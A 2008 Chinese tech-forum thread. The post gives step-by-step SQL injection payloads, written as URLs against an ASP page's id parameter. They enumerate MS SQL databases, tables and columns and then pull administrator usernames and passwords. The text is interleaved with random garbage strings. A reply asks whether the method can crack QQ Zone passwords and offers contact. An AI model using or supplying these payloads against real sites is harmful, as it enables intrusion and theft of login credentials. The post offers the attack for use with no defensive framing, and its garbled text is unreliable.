我爱电脑技术论坛 » 电脑综合区 » 从暴库到暴密码的一般步骤

tianshiren 发表于 2008-6-9 17:35

从暴库到暴密码的一般步骤

1:暴出所有库名. 6es7B6SPW"n4k-HL
http://www.***.com/***.asp?id=1 and 0<>(select count(*) %~?E%QNU!}
from master.dbo.sysdatabases where name>1 and dbid=6)
5m
how t?VLDg 依次提交 dbid = 7,8,9.... 得到更多的数据库名
3Qp^'}6LfX]u kS'W7\
&{2Np K8X ^I 2：暴出库中的表
B cdj]
j 假设存在一个bbs的数据库,提交下面的语句： -t3nV||,u(\:J
http://www.***.com/jump.asp?id=1 and 0<>(select top 1 name
kF/Y%[7V from bbs.dbo.sysobjects where xtype='U') E%^'QJ LooJ
来得到一个表 假设为 admin
$K%vf"PS,]7xe1Ao:Y 提交：
4~Lr'D,T.` http://www.***.com/jump.asp?id=1 and 0<>(select top 1 name
jh2~ d8RKSM from bbs.dbo.sysobjects where xtype='U' and name not in '`f0|ey,t,[/b;Q
('Admin')) _Tm:{+d:acIZ;B
来得到其他的表。 x0rLsIZ7Eo Z k

m9dg4K6j 3：暴出表中的字段
L0Ni%s-c*l#g+q 提交：
6ZAzu+zlW0o http://www.***.com/***.asp?id=1 and 0<>(select count(*)
Tic2tpr3f from bbs.dbo.sysobjects where xtype='U' and name='admin'
!Z+n;lW/v9tNa3LI and uid>(str(id))) A*GaQ1BK%? \{
得到UID的数值假设为18779569 uid=id
#B jm,K:] 提交：
h1t1B&o#|S http://www.***.com/***.asp?id=1 and 0<>(select top 1 name wn|
J a$T R
from bbs.dbo.syscolumns where id=18779569)
_U DAc*G/|
得到一个admin的一个字段,假设为 user_id
[4{ Kb,[q:nT 提交： 7^U(uwy
http://www.***.com/***.asp?id=1 and 0<>(select top 1 name
4OZ0pc(H X*V from bbs.dbo.syscolumns where id=18779569 and name not in
\&B'vnThzu:[ ('id',...)) V3flo!Is*R
来暴出其他的字段
+zmJcp u
c6XWp2tl
4：暴出用户名和密码等
+mN L b7^~7kV:Fqh 假设存在user_id username ,password 等字段,提交：
tvKX$vm
DbE http://www.***.com/***.asp?id=1 and 0<(select user_id from
DYTx%[^ BBS.dbo.admin where username>1) '?v5_Q6W2f
可以得到用户名
Yx)ZC#M ?0P/\} h
u 依次可以得到密码。。。。。

289955742 发表于 2008-6-18 23:26

可以用来暴QQ空间密码不？？？:)15) :)101:) z]g)]"h%gV
可以的话 联系我啊.......
1b!O#yL)oN'Y$n"Q/a 289955742

查看完整版本: 从暴库到暴密码的一般步骤